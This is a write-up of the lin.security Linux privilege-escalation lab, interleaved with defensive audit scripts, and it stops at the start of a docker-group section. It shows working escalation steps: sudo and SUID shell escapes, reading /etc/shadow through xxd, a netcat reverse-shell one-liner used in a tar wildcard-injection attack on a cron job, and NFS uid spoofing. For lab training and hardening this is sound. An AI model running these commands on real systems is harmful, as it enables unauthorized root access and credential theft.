
in.security privilege-escalation lab


lin.security is a lab for privilege escalation caused by Linux configuration problems. It is an Ubuntu 18.04 LTS virtual machine that provides many privilege escalation vulnerabilities for practising Linux permission knowledge. Download link:

https://in.security/downloads/lin.security_v1.0.ova

Low-privilege credentials for the lab: bob:secret

Check the current user's identity and groups: whoami, id

Check the distribution release and kernel version: lsb_release -a, uname -a

1 Permissions on Linux

1.1 Users and groups

User groups play an important role on Linux systems, and they provide selected users with an easy way to share files with each other. They also enable system administrators to manage user permissions more efficiently because they can assign permissions to groups rather than individual users.

Linux users are divided into administrators and ordinary users; ordinary users are further divided into system users and custom users.

System administrator: the root account, with UID 0, which has all system permissions. It is similar to the Administrator account on Windows and is the owner of the entire system.

System user: an account built in for the system's own management. It is usually created automatically during installation and cannot be used to log in to the operating system. The UID is between 1 and 499 (1 to 999 on CentOS 7). Users such as sshd and pulse are of this kind. It is similar to a system account on Windows, although its permissions are of course far lower than those of the SYSTEM account.

Custom user: an account created by root so that a person can log in and work on the system. The UID is 500 or above (1000 or above on CentOS 7). It is similar to an account in the Users group on Windows.

Every Linux user must belong to a group and cannot exist independently of one. Each file on Linux has an owner, a group, and "others". Group information can be viewed in /etc/group.

1.2 The /etc/passwd file

In /etc/passwd, each user has a record line that stores the user's basic properties. System administrators frequently modify this file to manage users.

Add an account to the system: useradd -g group -d /home/to/user -m username

Field meaning:

Username : Password (x means the hash is kept in /etc/shadow) : UID : GID : Comment (GECOS) : Home directory : Login shell

1.3 The /etc/shadow file

Field meaning:

Username : Encrypted password (! means no usable password) : Date of last change : Minimum days between changes : Maximum password age : Days of warning before expiry : Grace days after expiry : Account expiry date : Reserved field

The encrypted password has a fixed format: $id$salt$encrypted

id identifies the hash algorithm: 1 is MD5, 5 is SHA-256, 6 is SHA-512

salt is a random value generated by the system

encrypted is the hash of the salted password

1.4 File permissions

On Linux everything is a file, including ordinary files, directories, devices, sockets, etc.

rwx permissions on a directory

r: permission to read the directory listing, i.e. to query the file names in it (ls)

w: permission to add, delete, rename, copy, or move files and subdirectories inside the directory

x: whether the user can enter the directory and make it the working directory (without x, even with w, files cannot be written into the directory)

1.5 Special permissions

SUID

When the file is executed, it runs with the privileges of the file's owner

SGID

When the file is executed, it runs with the privileges of the file's group

SBIT (sticky bit)

Only the owner and the administrator can operate on the file

2 Privilege escalation via misconfigured sudo

sudo is a very common command. It lets ordinary users execute, with root privileges, commands that normally only the superuser may run. The commands here are system commands, and since everything on Linux is a file, a system command is also a file.

Generally, when an administrator needs a user to run commands as root, he configures sudo by editing /etc/sudoers. Ordinary users cannot view or edit this file; all they can do is check whether sudo permissions have been configured for them, using sudo -l.

The bob user can execute many commands, and several of them can be used to escalate to root simply and directly.

2.1 /bin/ash


2.2 /usr/bin/awk

View the password file /etc/shadow:

2.3 /usr/bin/curl


2.4 /usr/bin/find

Get a shell:

find . -exec /bin/sh \; -quit

This shows that even when only the find command is granted via sudo, it can be escalated to root, as long as the command is used cleverly. For reasons of space we will not give the exploitation method for every command; refer to https://gtfobins.github.io/, which covers many commands that can be abused this way.

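An added defender-side check for section 2, not code from the original post: it parses the text that sudo -l prints and flags rules that allow a binary GTFOBins lists as able to spawn a shell or read files as the run-as user. SAMPLE_SUDO_L is a constructed imitation of bob's sudo -l output, and SHELL_ESCAPES is a hand-picked subset of GTFOBins (the binaries discussed on this page plus common shells), not the complete list.

```python
"""Audit `sudo -l` output for entries that hand out a root shell.

Added example, not from the original post. SAMPLE_SUDO_L is a constructed
imitation of `sudo -l` output for the lab's bob user; SHELL_ESCAPES is a
small hand-picked subset of GTFOBins, not the full list.
"""
import re
from dataclasses import dataclass

# Binaries that, when run via sudo, give a shell or read arbitrary files as
# the run-as user (subset: the ones discussed on this page plus shells).
SHELL_ESCAPES = {"ash", "sh", "bash", "dash", "zsh", "awk", "find", "curl", "xxd", "taskset"}

SAMPLE_SUDO_L = """\
Matching Defaults entries for bob on linsecurity:
    env_reset, mail_badpass

User bob may run the following commands on linsecurity:
    (ALL) NOPASSWD: /bin/ash, /usr/bin/awk, /usr/bin/curl, /usr/bin/find
    (ALL) /usr/bin/apt-get update
"""

# One "(runas) [TAG: ...] cmd, cmd, ..." privilege line of sudo -l output.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")


@dataclass(frozen=True)
class SudoFinding:
    runas: str
    binary: str
    nopasswd: bool
    reason: str


def parse_sudo_l(text):
    """Return (runas, tags, [command strings]) for each privilege line."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True  # everything after this header is a privilege rule
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip(": ") for t in m.group("tags").split()} - {""}
        cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
        rules.append((m.group("runas"), tags, cmds))
    return rules


def audit_sudo(text):
    """Flag 'ALL' rules and rules whose binary has a known shell escape."""
    findings = []
    for runas, tags, cmds in parse_sudo_l(text):
        nopasswd = "NOPASSWD" in tags
        for cmd in cmds:
            binary = cmd.split()[0]
            name = binary.rsplit("/", 1)[-1]
            if cmd == "ALL":
                findings.append(SudoFinding(runas, cmd, nopasswd,
                                            f"unrestricted: any command as {runas}"))
            elif name in SHELL_ESCAPES:
                findings.append(SudoFinding(runas, binary, nopasswd,
                                            f"{name} can spawn a shell or read files as {runas} (see GTFOBins)"))
    return findings


if __name__ == "__main__":
    for f in audit_sudo(SAMPLE_SUDO_L):
        flag = " [NOPASSWD]" if f.nopasswd else ""
        print(f"{f.binary}{flag}: {f.reason}")
```

Run it against the real output of sudo -l on a host (for example by piping it into a file); every flagged line is a sudoers entry that should be rewritten to a purpose-built script or removed.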

3 Password hashes in /etc/passwd

Linux password hashes are stored in /etc/shadow, which ordinary users cannot read. What ordinary users can read is /etc/passwd, where entries normally look like this:

root:x:0:0:root:/root:/bin/bash

If an account's second field is a password hash rather than x, the hash is stored in /etc/passwd itself instead of /etc/shadow. On the lin.security virtual machine there is such an account, insecurity, whose uid and gid are both 0. Johnny or hash-identifier identifies the hash as descrypt, which can then be cracked.

Cracking it gives the password P@ssw0rd11.
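The checks from sections 1.2, 1.3 and 3 (a uid 0 account other than root, a hash left in the world-readable /etc/passwd, weak $1$ or descrypt hashes, empty passwords) as an added audit script; this is not code from the original post. The sample records are constructed: the user names and the uid-0 insecurity account mirror the lab, but the hash strings are placeholders that crack to nothing. Feed it the real file contents to audit a host.

```python
"""Audit passwd/shadow records for the weaknesses discussed in sections 1 and 3.

Added example, not from the original post. The sample records below are
constructed for this demonstration; the hash strings are made up.
"""
from dataclasses import dataclass

# Hash-algorithm ids in the $id$salt$encrypted format of /etc/shadow.
CRYPT_IDS = {"1": "MD5", "5": "SHA-256", "6": "SHA-512"}

# Constructed sample data (the shape of /etc/passwd and /etc/shadow, not real hashes).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
insecurity:AzER3pBxh6jD2:0:0::/root:/bin/bash
bob:x:1000:1000:bob:/home/bob:/bin/bash
svc:x:1001:1001:service:/var/lib/svc:/usr/sbin/nologin
"""
SAMPLE_SHADOW = """\
root:$6$saltsalt$notarealhash:18200:0:99999:7:::
bob:$6$saltsalt$notarealhash:18200:0:99999:7:::
svc:$1$saltsalt$notarealhash:18200:0:99999:7:::
"""


@dataclass(frozen=True)
class Finding:
    user: str
    issue: str


def parse_passwd(text):
    """Return (user, pw_field, uid, gid, shell) for every passwd record."""
    rows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7:
            raise ValueError(f"malformed passwd record: {line!r}")
        user, pw, uid, gid, _gecos, _home, shell = parts
        rows.append((user, pw, int(uid), int(gid), shell))
    return rows


def parse_shadow(text):
    """Return {user: encrypted-password field} for every shadow record."""
    hashes = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        parts = line.split(":")
        if len(parts) != 9:
            raise ValueError(f"malformed shadow record: {line!r}")
        hashes[parts[0]] = parts[1]
    return hashes


def classify_hash(pw):
    """Label a crypt(3) password field: empty, locked, a $id$ algorithm, or descrypt."""
    if pw == "":
        return "empty"
    if pw.startswith(("!", "*")):
        return "locked"
    if pw.startswith("$"):
        ident = pw.split("$")[1]
        return CRYPT_IDS.get(ident, f"unknown id {ident}")
    # No $ prefix: traditional 13-character DES crypt, as on the lab's insecurity account.
    return "descrypt"


def audit_accounts(passwd_text, shadow_text):
    """Flag uid-0 aliases, hashes leaked into passwd, and weak or empty hashes."""
    findings = []
    shadow = parse_shadow(shadow_text)
    for user, pw, uid, _gid, _shell in parse_passwd(passwd_text):
        if uid == 0 and user != "root":
            findings.append(Finding(user, "uid 0 account other than root"))
        if pw != "x":
            # A hash in the world-readable passwd file is exposed to every local user.
            findings.append(Finding(user, f"hash stored in /etc/passwd ({classify_hash(pw)})"))
            continue
        if user not in shadow:
            findings.append(Finding(user, "no matching shadow record"))
            continue
        kind = classify_hash(shadow[user])
        if kind == "empty":
            findings.append(Finding(user, "empty password"))
        elif kind in ("MD5", "descrypt"):
            findings.append(Finding(user, f"weak hash algorithm ({kind})"))
    return findings


if __name__ == "__main__":
    for f in audit_accounts(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print(f"{f.user}: {f.issue}")
```

classify_hash() keys on the $id$ prefix described in section 1.3; a field with no $ prefix is treated as traditional descrypt, which is what hash-identifier reports for the lab's insecurity account.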

4 Exploiting cron jobs and wildcards

The file /etc/cron.daily/backup is executed every minute.

This uses wildcards for local Linux privilege escalation. We need to open a second bob ssh session.

Use msfvenom to generate an nc reverse-shell one-liner; the command is as follows:

-p: payload

R: output the raw payload


root@kali:~# msfvenom -p cmd/unix/reverse_netcat lhost=127.0.0.1 lport=8888 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 91 bytes
mkfifo /tmp/kuhdq; nc 127.0.0.1 8888 0</tmp/kuhdq | /bin/sh >/tmp/kuhdq 2>&1; rm /tmp/kuhdq

Then, as bob, execute the following:

bob@linsecurity:~$ echo 'mkfifo /tmp/kuhdq; nc 127.0.0.1 8888 0</tmp/kuhdq | /bin/sh >/tmp/kuhdq 2>&1; rm /tmp/kuhdq' > shell.sh; chmod +x shell.sh
bob@linsecurity:~$ echo '' > '--checkpoint-action=exec=sh shell.sh'
bob@linsecurity:~$ echo '' > --checkpoint=1

Start an nc listener in the other session:

nc -lvnp 8888

--checkpoint[=NUMBER]  display a progress message every NUMBER records (default 10)

--checkpoint-action=ACTION  execute ACTION on each checkpoint

The --checkpoint-action option specifies a program to run when a checkpoint is reached, which lets us run an arbitrary command. Because the backup job passes the directory contents to tar through a shell wildcard, the file names --checkpoint=1 and --checkpoint-action=exec=sh shell.sh are handed to the tar program as command-line options.
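An added example for section 4, not code from the original post, showing from the defender's side why the wildcard is the problem: it builds the argument vector a cron job like the lab's backup would pass to tar, with and without the -- terminator, and lists which operands tar's option parser would swallow. The scratch directory and file names are constructed here, and demo() never runs tar, so it is safe to execute anywhere.

```python
"""Show why `tar ... *` in a cron job is injectable and how to build the
command so that file names cannot become options.

Added example, not from the original post. The scratch directory and file
names are constructed here; demo() only builds argument vectors and never
runs tar.
"""
import os
import tempfile


def shell_glob(directory):
    """Mimic an unquoted `*`: every non-dot entry, sorted, as the shell expands it."""
    return sorted(n for n in os.listdir(directory) if not n.startswith("."))


def tar_argv(names, safe):
    """Argument vector for the backup job. With safe=True, '--' ends option
    parsing, so a file literally named --checkpoint=1 is just a file operand."""
    base = ["tar", "czf", "/var/backups/home.tgz"]
    if safe:
        return base + ["--"] + list(names)
    return base + list(names)


def injected_options(argv):
    """Operands that GNU tar's option parser would consume as options: tokens
    beginning with '-' that appear before any '--' terminator."""
    hits = []
    for tok in argv[3:]:
        if tok == "--":
            break
        if tok.startswith("-"):
            hits.append(tok)
    return hits


def option_named_entries(directory):
    """Detection for the defender: entries whose names start with '-'.
    Such names have no business in a user's home directory."""
    return [n for n in os.listdir(directory) if n.startswith("-")]


def demo():
    """Plant the file names from the write-up in a scratch directory and compare
    what the unsafe and safe command lines would pass to tar."""
    with tempfile.TemporaryDirectory() as d:
        for name in ("notes.txt", "shell.sh", "--checkpoint=1",
                     "--checkpoint-action=exec=sh shell.sh"):
            open(os.path.join(d, name), "w").close()
        names = shell_glob(d)
        return {
            "planted": sorted(option_named_entries(d)),
            "unsafe": injected_options(tar_argv(names, safe=False)),
            "safe": injected_options(tar_argv(names, safe=True)),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The same fix applies to any wildcard-driven job: terminate options with --, or prefix the glob with a path (./*), so the shell's expansion can only ever produce operands. The option_named_entries() check is what a periodic integrity job or a host-based detection rule would look for.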

5 Exploiting hidden files

Hidden files sometimes contain important information. For example, search for all hidden files under the home directories and list them with ls -al:

find / -name '.*' -type f -path '/home/*' -exec ls -al {} \; 2>/dev/null

I found that the user susan has a hidden file .secret, and that it stores susan's login password.

6 Exploiting SUID

6.1 Method one

SUID is the combination of uid and s, where s stands for a special permission. Normally a file's permissions are three digits, such as 0755, and no special permission is configured by default. If the superuser wants a user to have root privileges while executing a particular file, he configures the special permission on it.

For example, the passwd command modifies /etc/shadow, which only root may modify, so originally only root should be able to run passwd. To let ordinary users change their own passwords, the system gives passwd the special permission and adds a restriction that it can only change the caller's own password.

Since passwd is restricted, granting it the special permission is not a problem, but if the superuser's special permission is handed out indiscriminately, it leads to privilege escalation.

So how do we find out whether files with special permissions exist on the system? All SUID files can be found quickly with the following command:

find / -perm -4000 -type f -exec ls -la {} \; 2>/dev/null

We found the file xxd. It is a command binary: xxd displays a file in hexadecimal. It has the special permission set, and its group is itsservices with execute permission x.

This is very dangerous: once SUID and execute permission are combined, it can lead to privilege escalation.

Checking with the command, we found that the user susan belongs to the group itsservices.

We use it to read /etc/shadow. For more ways to use it, see https://gtfobins.github.io/gtfobins/xxd/.

xxd '/etc/shadow' | xxd -r

Note: a SUID find used as find /dir -exec 'command' \; has the same privilege escalation effect.

6.2 Method two

Besides the file above, another file with execute permission for "other" was found. It is not limited to particular users, so it is even more harmful.

Referring to https://gtfobins.github.io/gtfobins/taskset/#suid-enabled, this file can be used to obtain a shell directly.
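An added triage script for section 6 (both methods), not code from the original post. find_setid_files() walks the real filesystem like the find command above; classify() works on (path, mode, uid, gid) tuples so that the constructed SAMPLE_ENTRIES, which mirror the lab's xxd (group-executable) and taskset (world-executable) findings, can be checked without the VM. BASELINE is an assumed list of set-uid programs a stock Ubuntu needs and GTFO_SUID is a hand-picked subset of GTFOBins' SUID list; both are meant to be tuned, not taken as complete.

```python
"""Find and triage set-uid/set-gid files as in section 6.

Added example, not from the original post. BASELINE and GTFO_SUID are
assumed, hand-picked lists; SAMPLE_ENTRIES is constructed.
"""
import os
import stat

# Binaries that GTFOBins lists as giving a shell or file read when SUID
# (subset; xxd and taskset are the ones found in the lab).
GTFO_SUID = {"xxd", "taskset", "find", "awk", "ash", "bash", "sh", "dash"}

# Set-uid programs a stock system relies on; tune to your own baseline.
BASELINE = {"/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/chsh",
            "/usr/bin/chfn", "/usr/bin/newgrp", "/usr/bin/gpasswd"}

# Constructed sample of (path, st_mode, uid, gid) tuples.
SAMPLE_ENTRIES = [
    ("/usr/bin/passwd", 0o104755, 0, 0),      # expected, restricted to own password
    ("/usr/bin/xxd", 0o104750, 0, 1005),      # SUID root, executable by group 1005
    ("/usr/bin/taskset", 0o104755, 0, 0),     # SUID root, executable by everyone
    ("/usr/bin/ls", 0o100755, 0, 0),          # no set-id bit at all
    ("/usr/local/bin/tool", 0o102755, 0, 5),  # SGID only, group 5
]


def find_setid_files(root="/"):
    """Walk the filesystem and collect regular files with the SUID or SGID bit."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished; skip
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append((path, st.st_mode, st.st_uid, st.st_gid))
    return hits


def classify(path, mode, uid, gid, baseline=BASELINE):
    """Return the reasons an entry deserves attention (empty list if benign)."""
    if not mode & (stat.S_ISUID | stat.S_ISGID) or path in baseline:
        return []
    name = os.path.basename(path)
    reasons = []
    if mode & stat.S_ISUID and uid == 0:
        reasons.append("set-uid root binary outside the baseline")
    if mode & stat.S_ISGID:
        reasons.append(f"set-gid to group {gid}")
    if name in GTFO_SUID:
        reasons.append(f"{name} has a known SUID escape on GTFOBins")
    if reasons:
        # Who can actually trigger it: everyone, or only one group (section 6.1 vs 6.2).
        if mode & stat.S_IXOTH:
            reasons.append("executable by everyone")
        elif mode & stat.S_IXGRP:
            reasons.append(f"executable by members of group {gid}")
    return reasons


def audit(entries, baseline=BASELINE):
    """Map each flagged path to its reasons."""
    report = {}
    for path, mode, uid, gid in entries:
        reasons = classify(path, mode, uid, gid, baseline)
        if reasons:
            report[path] = reasons
    return report


if __name__ == "__main__":
    for path, reasons in audit(SAMPLE_ENTRIES).items():
        print(path, "->", "; ".join(reasons))
```

To run it on a live host replace SAMPLE_ENTRIES with find_setid_files(); anything reported that is not in your baseline should have its set-id bit removed or its execute permission narrowed to the users who genuinely need it.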

7 NFS privilege escalation

Scan the ports with nmap to see the open services: nmap -sS -Pn -p- -A IP

Port 2049, the NFS service, is open. The rpcinfo -p IP command can also be used to determine whether NFS is running on the host.

showmount can gather information with the following parameters, for example the mount points, the connected hosts, and the exported directories:

showmount IP      // connected hosts
showmount -d IP   // directories
showmount -a IP   // mount points

There is also an msf module for listing exported folders: auxiliary/scanner/nfs/nfsmount.

The home directory of the peter account can be mounted:

mkdir /mnt/peter
mount 192.168.68.99:/home/peter /mnt/peter/

In the mounted peter home directory, the owner and group of the files are shown as 1001 and 1005 respectively.

Trying to create a file in this directory fails for lack of permissions.

Even though we are root on the Kali attack machine, we still have no write permission, because by default the client's root identity is squashed to the anonymous user (root_squash).

The UID and GID of the file owner can be forged to fool the NFS server: create a group with gid 1005, then create a peter account with uid 1001 and gid 1005.

Switch the client user to peter; the server then treats it as the existing user.

An ssh public key can be written directly into the .ssh folder, after which we can log in with ssh.
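An added server-side audit for section 7, not code from the original post. The uid-forging step above works because, with the default root_squash, the server still believes whatever uid and gid a client presents, so an export that is writable and reachable by any host is owned by whoever can create a matching local user. The script parses an /etc/exports file and flags exactly those conditions: exports to every host, no_root_squash, and read-write exports without all_squash or Kerberos (sec=krb5*). SAMPLE_EXPORTS is constructed in the shape of the lab's /home/peter export; check the real file or showmount -e on your own server.

```python
"""Audit /etc/exports for the conditions that make the uid-spoofing mount in
section 7 work.

Added example, not from the original post. SAMPLE_EXPORTS is a constructed
exports file, not the lab's real configuration.
"""
import re

SAMPLE_EXPORTS = """\
# constructed sample, not the lab's real /etc/exports
/home/peter *(rw,sync,no_subtree_check)
/srv/pub 10.0.0.0/24(ro,sync,root_squash)
/srv/share 10.0.0.5(rw,all_squash,anonuid=65534,anongid=65534)
"""

# "host(opt,opt)" or a bare "host" (default options) or a bare "(opt)" token,
# which exportfs applies to every host.
CLIENT_RE = re.compile(r"^([^(]*)(?:\((.*)\))?$")


def parse_exports(text):
    """Return (path, host, {options}) for every client of every export line."""
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        path, *clients = line.split()
        for tok in clients:
            m = CLIENT_RE.match(tok)
            host = m.group(1) or "*"
            opts = set(filter(None, (m.group(2) or "").split(",")))
            entries.append((path, host, opts))
    return entries


def audit_exports(text):
    """Flag the settings that let a client choose its own identity."""
    findings = []
    for path, host, opts in parse_exports(text):
        if host in ("*", "0.0.0.0/0"):
            findings.append((path, host, "exported to every host"))
        if "no_root_squash" in opts:
            findings.append((path, host, "client root is trusted as uid 0"))
        kerberos = any(o.startswith("sec=krb5") for o in opts)
        if "rw" in opts and "all_squash" not in opts and not kerberos:
            findings.append((path, host,
                             "writable and ownership is decided by the uid/gid the client claims"))
    return findings


if __name__ == "__main__":
    for path, host, reason in audit_exports(SAMPLE_EXPORTS):
        print(f"{path} [{host}]: {reason}")
```

Restricting the export to named hosts closes the mount from arbitrary machines; all_squash (or Kerberos authentication) is what actually stops a client from impersonating uid 1001, because the server then ignores the uid the client sends.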

8 Privilege escalation via the docker group

It turns out that peter belongs to the docker group:
